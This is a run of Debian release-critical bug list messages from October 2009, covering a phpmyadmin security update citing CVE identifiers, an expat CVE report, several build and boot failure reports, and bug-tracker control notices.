maintenance software pp. Thijs Kinkhorst th...@debian.org (supplier of updated phpmyadmin package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@debian.org) -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Format: 1.8 Date: Sun, 25 Oct 2009 12:30:40 +0100 Source: phpmyadmin Binary: phpmyadmin Architecture: source all Version: 4:2.11.8.1-5+lenny3 Distribution: stable-security Urgency: high Maintainer: Thijs Kinkhorst th...@debian.org Changed-By: Thijs Kinkhorst th...@debian.org Description: phpmyadmin - MySQL web administration tool Closes: 535044 543460 552194 Changes: phpmyadmin (4:2.11.8.1-5+lenny3) stable-security; urgency=low . * Correct some documentation issues of new script. . phpmyadmin (4:2.11.8.1-5+lenny2) stable-security; urgency=high . * Upload to stable to fix security issues. * Fixes XSS and SQL injection (Closes: #552194). [PMASA-2009-6, CVE-2009-3696, CVE-2009-3697] * Allow saving of configuration from setup script only after explicit action from administrator (Closes: #535044, #543460). Checksums-Sha1: 104dd1b5a36a5f1f33ad293cbd374485fcb887c4 1547 phpmyadmin_2.11.8.1-5+lenny3.dsc e73e24d04b0c73386de7ae4e112227d17eae7d98 63773 phpmyadmin_2.11.8.1-5+lenny3.diff.gz c90b5b5168330a0a8e4eeba1c0aea405e7e1a472 2883628 phpmyadmin_2.11.8.1-5+lenny3_all.deb Checksums-Sha256: 7d53fc216fd8b99ea440b72870ff018527b189cce5242618e4baeb2853123ff2 1547 phpmyadmin_2.11.8.1-5+lenny3.dsc e5fc26908652779a12d91652ac2c270c583b1922a338139b9a231cee910911bd 63773 phpmyadmin_2.11.8.1-5+lenny3.diff.gz
Bug#552248: initscripts: checkfs.sh fails with device doesn't exist on ext4 /home
Yes, it looks a lot alike, not the initial report but the second part. I'll follow #535130 and stop trying to be [less than] helpful on the matter. Thanks for the pointer. -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#552385: must not migrate before grub-installer = 1.47
Package: grub-pc Version: 1.97-1 Severity: serious Some setups used by D-I now require --force, and grub-installer only passes this flag starting with 1.47. D-I team: please close this bug when we don't need to support grub-installer 1.47 anymore. -- System Information: Debian Release: 5.0.3 APT prefers stable APT policy: (500, 'stable') Architecture: amd64 (x86_64) Kernel: Linux 2.6.26-libre2-2-amd64 (SMP w/2 CPU cores) Locale: LANG=ca_AD.UTF-8, LC_CTYPE=ca_AD.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/bash Versions of packages grub-pc depends on: ii debconf [debconf-2.0] 1.5.24 Debian configuration management sy ii grub-common 1.96+20080724-16 GRand Unified Bootloader, version ii libc6 2.7-18 GNU C Library: Shared libraries ii liblzo2-2 2.03-1 data compression library ii libncurses5 5.7+20081213-1 shared libraries for terminal hand grub-pc recommends no packages. Versions of packages grub-pc suggests: ii desktop-base 5.0.3 common files for the Debian Deskto pn os-prober none (no description available) -- debconf information excluded -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#532823: Linking wmweather+ with gnutls instead of openssl
Hi, I've also just built a package that's depending on libcurl4-gnutls-dev instead. It works fine, so I'll prepare a new package for the archive within the next days (that also needs to clean up one two other things). Regards, Martin -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#551936: expat: CVE-2009-2625
Hi security team, I recently received this bug report: Am Mittwoch, den 21.10.2009, 18:38 -0400 schrieb Michael Gilbert: package: expat version: 1.95.8-3 severity: serious tags: security hello, a security issue has been disclosed for expat. see [0],[1]. this affects all supported debian releases, so please coordinate with the security team to prepare DSAs. mike [0] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2625 [1] https://bugs.gentoo.org/show_bug.cgi?id=280615 The dpatch patch is already available at http://svn.debian.org/wsvn/debian-xml-sgml/packages/expat/trunk/debian/patches/551936_CVE_2009_2625.dpatch Shall I prepare the packages (I'm registered as DM for expat 2.0.1, but not for expat in oldstable) or do you want to do this? Regards, Daniel signature.asc Description: Dies ist ein digital signierter Nachrichtenteil
Processed: closing 548440
Processing commands for cont...@bugs.debian.org: close 548440 Bug#548440: please restore db4.5 'close' is deprecated; see http://www.debian.org/Bugs/Developer#closing. Bug closed, send any further explanations to Clint Adams sch...@debian.org End of message, stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#536929: marked as done (slony1: FTBFS: slony1_funcs.c:1360: error: too few arguments to function 'typenameTypeId')
Your message dated Sun, 25 Oct 2009 22:30:18 + with message-id e1n2bbo-0003rj...@ries.debian.org and subject line Bug#536929: fixed in slony1 1.2.16-2 has caused the Debian Bug report #536929, regarding slony1: FTBFS: slony1_funcs.c:1360: error: too few arguments to function 'typenameTypeId' to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 536929: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=536929 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems ---BeginMessage--- Package: slony1 Version: 1.2.16-1 Severity: serious User: debian...@lists.debian.org Usertags: qa-ftbfs-20090713 qa-ftbfs Justification: FTBFS on amd64 Hi, During a rebuild of all packages in sid, your package failed to build on amd64. Relevant part: cc -g -O2 -g -Wall -O2 -Wall -Wmissing-prototypes -Wmissing-declarations -I../.. -fpic -I/usr/include/postgresql/8.3/server/ -I/usr/include/postgresql/ -I/usr/include/postgresql/8.3/server/ -I/usr/include/postgresql/ -I/usr/include/postgresql/8.3/server/ -I/usr/include/postgresql/ -c -o slony1_funcs.o slony1_funcs.c slony1_funcs.c: In function '_Slony_I_logTrigger': slony1_funcs.c:700: warning: implicit declaration of function 'compatible_oper_funcid' slony1_funcs.c:700: warning: implicit declaration of function 'makeList1' slony1_funcs.c: In function 'slon_quote_literal': slony1_funcs.c:1106: warning: pointer targets in passing argument 1 of 'pg_mblen' differ in signedness slony1_funcs.c: In function 'getClusterStatus': slony1_funcs.c:1360: warning: passing argument 1 of 'typenameTypeId' from incompatible pointer type slony1_funcs.c:1360: error: too few arguments to function 'typenameTypeId' slony1_funcs.c:1447: warning: passing argument 1 of 'typenameTypeId' from incompatible pointer type slony1_funcs.c:1447: error: too few arguments to function 'typenameTypeId' make[3]: *** [slony1_funcs.o] Error 1 The full build log is available from: http://people.debian.org/~lucas/logs/2009/07/13/slony1_1.2.16-1_lsid64.buildlog A list of current common problems and possible solutions is available at http://wiki.debian.org/qa.debian.org/FTBFS . You're welcome to contribute! About the archive rebuild: The rebuild was done on about 50 AMD64 nodes of the Grid'5000 platform, using a clean chroot. Internet was not accessible from the build systems. -- | Lucas Nussbaum | lu...@lucas-nussbaum.net http://www.lucas-nussbaum.net/ | | jabber: lu...@nussbaum.fr GPG: 1024D/023B3F4F | ---End Message--- ---BeginMessage--- Source: slony1 Source-Version: 1.2.16-2 We believe that the bug you reported is fixed in the latest version of slony1, which is due to be installed in the Debian FTP archive: postgresql-8.3-slony1_1.2.16-2_i386.deb to pool/main/s/slony1/postgresql-8.3-slony1_1.2.16-2_i386.deb slony1-bin_1.2.16-2_i386.deb to pool/main/s/slony1/slony1-bin_1.2.16-2_i386.deb slony1-doc_1.2.16-2_all.deb to pool/main/s/slony1/slony1-doc_1.2.16-2_all.deb slony1_1.2.16-2.diff.gz to pool/main/s/slony1/slony1_1.2.16-2.diff.gz slony1_1.2.16-2.dsc to pool/main/s/slony1/slony1_1.2.16-2.dsc A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 536...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Peter Eisentraut pet...@debian.org (supplier of updated slony1 package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@debian.org) -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Format: 1.8 Date: Sun, 25 Oct 2009 22:12:34 +0200 Source: slony1 Binary: slony1-bin postgresql-8.3-slony1 slony1-doc Architecture: source all i386 Version: 1.2.16-2 Distribution: unstable Urgency: low Maintainer: Peter Eisentraut pet...@debian.org Changed-By: Peter Eisentraut pet...@debian.org Description: postgresql-8.3-slony1 - replication system for PostgreSQL: PostgreSQL server plug-in slony1-bin - replication system for PostgreSQL: daemon and administration tool slony1-doc - Slony-I documentation Closes: 536929 Changes: slony1 (1.2.16-2) unstable; urgency=low . * Altered include order in configure script to fix test results and FTBFS (closes: #536929) * Updated standards version Checksums-Sha1: 54f0f123e921629816d584828176cd186e35e2c1 1237 slony1_1.2.16-2.dsc 3fd9df5db9bb4f0e34582f1f1297a40ee1b0f949 10530 slony1_1.2.16-2.diff.gz
Bug#552248: marked as done (initscripts: checkfs.sh fails with device doesn't exist on ext4 /home partitions (two different computers))
Your message dated Sun, 25 Oct 2009 22:31:02 + with message-id e1n2bc6-0003u6...@ries.debian.org and subject line Bug#552248: fixed in udev 146-6 has caused the Debian Bug report #552248, regarding initscripts: checkfs.sh fails with device doesn't exist on ext4 /home partitions (two different computers) to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 552248: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=552248 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems ---BeginMessage--- Package: initscripts Version: 2.87dsf-6 Severity: grave Justification: renders package unusable -- System Information: Debian Release: squeeze/sid APT prefers testing APT policy: (990, 'testing'), (500, 'unstable'), (101, 'experimental') Architecture: amd64 (x86_64) Kernel: Linux 2.6.31.5-perso64 (SMP w/2 CPU cores) Locale: LANG=fr_FR.UTF-8, LC_CTYPE=fr_FR.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/dash Versions of packages initscripts depends on: ii coreutils 7.4-2 The GNU core utilities ii debianutils 3.2.1 Miscellaneous utilities specific t ii libc6 2.9-25 GNU C Library: Shared libraries ii lsb-base 3.2-23 Linux Standard Base 3.2 init scrip ii mount 2.16.1-4 Tools for mounting and manipulatin ii sysv-rc 2.87dsf-6 System-V-like runlevel change mech ii sysvinit-utils2.87dsf-6 System-V-like utilities Versions of packages initscripts recommends: ii e2fsprogs 1.41.9-1 ext2/ext3/ext4 file system utiliti ii psmisc22.8-1 utilities that use the proc file s initscripts suggests no packages. -- no debconf information On two different Squeeze amd64 systems, with custom kernel or Stock Debian ones, the boot process fails when checkfs.sh kicks in. This is on ext4 filesystem (one laptop, one raid1 desktop), tried with UUID and /dev/ style identifications in fstab with the same result, fsck.ext4 aborts with special device [name/uuid] doesn't exist and drops to a rescue shell. From the rescue shell it's impossible to run fsck or mount the /home partition (always the special device doesn't exist message), so boot process can't be completed, only reboot (temporarily) solves the problem. The /home partitions are in good shape, running fsck.ext4 from live-cd or from runlevel 1 doesn't show any problem. ---End Message--- ---BeginMessage--- Source: udev Source-Version: 146-6 We believe that the bug you reported is fixed in the latest version of udev, which is due to be installed in the Debian FTP archive: gir1.0-gudev-1.0_146-6_i386.deb to pool/main/u/udev/gir1.0-gudev-1.0_146-6_i386.deb libgudev-1.0-0_146-6_i386.deb to pool/main/u/udev/libgudev-1.0-0_146-6_i386.deb libgudev-1.0-dev_146-6_i386.deb to pool/main/u/udev/libgudev-1.0-dev_146-6_i386.deb libudev-dev_146-6_i386.deb to pool/main/u/udev/libudev-dev_146-6_i386.deb libudev0_146-6_i386.deb to pool/main/u/udev/libudev0_146-6_i386.deb udev-udeb_146-6_i386.udeb to pool/main/u/udev/udev-udeb_146-6_i386.udeb udev_146-6.diff.gz to pool/main/u/udev/udev_146-6.diff.gz udev_146-6.dsc to pool/main/u/udev/udev_146-6.dsc udev_146-6_i386.deb to pool/main/u/udev/udev_146-6_i386.deb A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 552...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Marco d'Itri m...@linux.it (supplier of updated udev package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@debian.org) -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Format: 1.8 Date: Sun, 25 Oct 2009 20:30:45 +0100 Source: udev Binary: udev libudev0 libudev-dev udev-udeb libgudev-1.0-0 gir1.0-gudev-1.0 libgudev-1.0-dev Architecture: source i386 Version: 146-6 Distribution: unstable Urgency: high Maintainer: Marco d'Itri m...@linux.it Changed-By: Marco d'Itri m...@linux.it Description: gir1.0-gudev-1.0 - libgudev-1.0 introspection data libgudev-1.0-0 - GObject-based wrapper library for libudev libgudev-1.0-dev - libgudev-1.0 development files libudev-dev - libudev development files libudev0 - libudev shared library udev - /dev/ and hotplug management daemon udev-udeb - /dev/ and hotplug
Processed: Merge bugs related to the same problem
Processing commands for cont...@bugs.debian.org: forcemerge 549298 549287 549083 Bug#549298: mdadm should copy its own rules file to the initramfs Bug#549083: mdadm: Since 3.0-3.1, created initrd doesnt allow the system to boot Bug#549287: root disk not found Forcibly Merged 549083 549287 549298. thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#552375: readahead-fedora: machine fails to boot after installation
Євгеній Мещеряков wrote: After installtion of readahead-fedora package machine fails to boot. Last messages are: Kernel: Linux 2.6.32-rc5 (SMP w/2 CPU cores; PREEMPT) readahead-fedora relies on the audit kernel subsystem and you are using a self-compiled kernel. I bet you haven't enabled AUDIT, as the default Debian kernels do. signature.asc Description: OpenPGP digital signature
Bug#552375: readahead-fedora: machine fails to boot after installation
severity 552375 important thanks Thanks for reply, I'll try to enable audit, but is it possible for readahead-fedora to just fail, if audit is not enabled and give an error message? 25 жовтня 2009 о 23:37 +0100 Michael Biebl написав(-ла): Євгеній Мещеряков wrote: After installtion of readahead-fedora package machine fails to boot. Last messages are: Kernel: Linux 2.6.32-rc5 (SMP w/2 CPU cores; PREEMPT) readahead-fedora relies on the audit kernel subsystem and you are using a self-compiled kernel. I bet you haven't enabled AUDIT, as the default Debian kernels do. signature.asc Description: Digital signature
Processed: Re: Bug#552375: readahead-fedora: machine fails to boot after installation
Processing commands for cont...@bugs.debian.org: severity 552375 important Bug #552375 [readahead-fedora] readahead-fedora: machine fails to boot after installation Severity set to 'important' from 'grave' thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#533804: Bug: 533804
Tags: patch Attached is a very simple patch. Since arm (old ABI) has been removed post-lenny, it simply reverts the patch for 463277. I've verified it builds/installs on armel and i386. It's a full debdiff, including the changelog entry, which should of course be edited by whomever prepares the upload. afnix_533804.debdiff Description: Binary data